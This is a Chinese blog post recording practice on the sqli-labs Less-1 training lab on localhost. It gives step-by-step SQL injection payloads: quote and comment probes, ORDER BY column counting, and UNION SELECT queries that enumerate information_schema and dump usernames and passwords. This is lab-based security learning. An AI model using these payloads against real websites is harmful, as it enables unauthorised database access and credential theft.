sqli-labs靶场Page1(Basic Challenges)练习记录1

已于 2022-11-12 19:36:06 修改
阅读量143 收藏 1
点赞数
分类专栏: 渗透测试学习笔记 文章标签: 网络安全
于 2022-11-12 19:10:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49015143/article/details/127823725
版权

Get显错注入

1.初始页面如下:

 2.在后面输入为?id=1--+:

3.在后面输入为?id=1 and 1=2--+,发现页面没有变化,猜测可能是字符型注入

4.在后面输入为http://127.0.0.1/sqlilabs/Less-1/?id=1' and 1=2--+,页面发生变化,确定为字符型注入

5. 开始通过order by猜测字段数量,发现字段数为3和字段数为4发生变化:

?id=1' order by 3--+

?id=1' order by 4--+

由此可判断字段数为3

 6.将id值改为-1(即一个不存在的id值)联合查询获取显示位,发现显示位如下:

?id=-1' union select 1,2,3--+

 7.开始获取数据库:

当前数据库:

?id=-1' union select 1,(select database()),3--+

 所有数据库:

?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+

 8.获取当前数据库表名:

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+;

 

 9.获取表中所有字段:

users表:

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

security.users表:

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+

 10.自此到了尾声,直接获取我们需要的security.users表字段内容:

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

风不归Alkaid
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
SQLi-LABS Page-1(Basic Challenges)1-22
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场Page1(Basic Challenges)练习记录6
风不归的乐园
11-13 209
sqli-labs靶场Page1(Basic Challenges)练习记录6
sqli-labs靶场Page1(Basic Challenges)练习记录5
风不归的乐园
11-13 166
sqli-labs靶场Page1(Basic Challenges)练习记录5
零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶)
Ms08067安全实验室
12-20 1万+
文章来源 | MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、s...
【数据库连接问题】【靶场访问错误】Table ‘xxx‘ doesn‘t exist,文件‘Not Find‘ 可能是管理软件与终端本身的一个连接问题
04-06 5748
MySQL和phpstudy之间的尔虞我诈……
Mysql报Table ‘mysql.user‘ doesn‘t exist问题解决记录
热门推荐
ABestRookie的博客
07-05 2万+
Mysql报Table 'mysql.user' doesn't exist问题解决记录问题起源:排查记录:解决方法:1 安装Mysql的文件中`data\mysql\`目录下就有user表的三个文件,拷贝三个user文件到C盘的mysql数据库下,启动服务,重新设置用户和权限即可.2 从一个新的Mysql安装包里面获取这三个user文件,拷贝三个user文件到C盘的mysql数据库下,启动服务,重新设置用户和权限即可. 前天突然出现了这个问题,花费了很多时间去解决问题.记录一下,希望能给大家避坑 问题
SQLi-LABS Page-1(Basic Challenges)
07-24
SQLi-LABS Page-1(Basic Challenges) 1-22关 附带多种方法
SQLi-LABS Page-1(Basic Challenges)1-22关
05-18
SQLi-LABS Page-1(Basic Challenges)1-22关
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8241
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于多种编程语言的卡拉音乐播放器设计源码
05-28
本项目是基于多种编程语言的卡拉音乐播放器设计源码,包含625个文件,其中包括389个JavaScript文件、70个TypeScript文件、52个PNG图像文件、22个JSON配置文件、19个Vue文件、12个MAP文件、11个WXSS样式文件、9个WXML模板文件、7个SVG文件和5个EOT字体文件。系统专注于提供卡拉音乐播放器功能,支持歌曲播放、播放列表管理等功能,为用户提供了一个稳定、高效的卡拉音乐播放器。
QTabWidget实现的炫酷标签工具栏+源码
05-28
qt 用法链接:https://menghui666.blog.csdn.net/article/details/139276655?spm=1001.2014.3001.5502 该项目基于QTabWidget和QTabBar实现了灵活的标签工具栏,主要包含如下功能: 1、标签栏可以收起,可以展开 2、可以在标签栏中添加新的标签界面 3、可以从标签工具栏中把界面拖出来,也可以拖回去 4、关闭拖出来的界面会自动回到标签工具栏 5、可以调换标签工具栏中界面的顺序
VB学生公寓管理系统(源代码+论文).rar
05-28
计算机专业毕业设计VB精品论文资源
基于springboot的高校心理教育辅导管理系统
05-28
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我v:19306446185 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! https://img-blog.csdnimg.cn/direct/e73dc0ac8d27434b86d886db5a438c71.jpeg
debugpy-1.0.0b1-cp34-cp34m-manylinux1_x86_64.whl
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
grpcio-1.57.0-cp37-cp37m-manylinux_2_17_aarch64.whl
最新发布
05-28
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
ubuntu搭建sqli-labs靶场
10-15
好的,以下是搭建sqli-labs靶场的步骤: 1. 安装LAMP环境(Linux + Apache + MySQL + PHP): ``` sudo apt-get update sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql ``` 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

风不归Alkaid

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值